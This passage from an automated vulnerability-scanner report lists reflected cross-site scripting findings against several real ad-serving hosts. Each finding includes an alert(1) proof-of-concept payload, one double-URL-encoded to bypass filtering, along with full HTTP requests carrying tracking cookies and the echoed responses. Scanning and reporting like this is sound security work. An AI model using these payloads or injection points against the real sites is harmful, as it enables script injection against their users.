Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc24d"-alert(1)-"d0287f2bb97 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtwbc24d"-alert(1)-"d0287f2bb97&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.47. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e728'-alert(1)-'54ab655354d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw4e728'-alert(1)-'54ab655354d&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.48. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17ecf'-alert(1)-'9bd825e5b22 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l17ecf'-alert(1)-'9bd825e5b22&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u
...[SNIP]...

1.49. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a70"-alert(1)-"52f10523c4a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1e7/%2a/s%3B233905705%3B0-0%3B0%3B57865904%3B4307-300/250%3B39213496/39231283/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l70a70"-alert(1)-"52f10523c4a&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20u
...[SNIP]...

1.50. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 was submitted in the admeld_callback parameter. This input was echoed as 3a018';alert(1)//29ac3d5f519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /v0/admeld-match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3a018%2527%253balert%25281%2529%252f%252f29ac3d5f519 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; bh="b!!!$E!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"; lifb=ORtsV69Ah<fqyac; ih="b!!!!B!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=.Sexf5_x-bh5ryLshEiqN6hm(mMpyr; pv1="b!!!!7!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~"

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:03 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 261
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match3a018';alert(1)//29ac3d5f519?admeld_adprovider_id=420&external_user_id=0&expiration=1297968783" /><img width="0" height="0" sr
...[SNIP]...

1.51. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8cd2'%3balert(1)//13a730e6121 was submitted in the admeld_adprovider_id parameter. This input was echoed as b8cd2';alert(1)//13a730e6121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78b8cd2'%3balert(1)//13a730e6121&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:02 GMT
X-Name: rtb-o06
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78b8cd2';alert(1)//13a730e6121&external_user_id=0&expiration=1297018382" alt="" />');

1.52. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19652'%3balert(1)//c53cf824e4b was submitted in the admeld_callback parameter. This input was echoed as 19652';alert(1)//c53cf824e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match19652'%3balert(1)//c53cf824e4b HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754766130&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:53:03 GMT
X-Name: rtb-o03
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match19652';alert(1)//c53cf824e4b?admeld_adprovider_id=78&external_user_id=0&expiration=1297018383" alt="" />');

1.53. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5e8'%3balert(1)//fba03bbdfb2 was submitted in the admeld_adprovider_id parameter. This input was echoed as ff5e8';alert(1)//fba03bbdfb2 in the application's response.

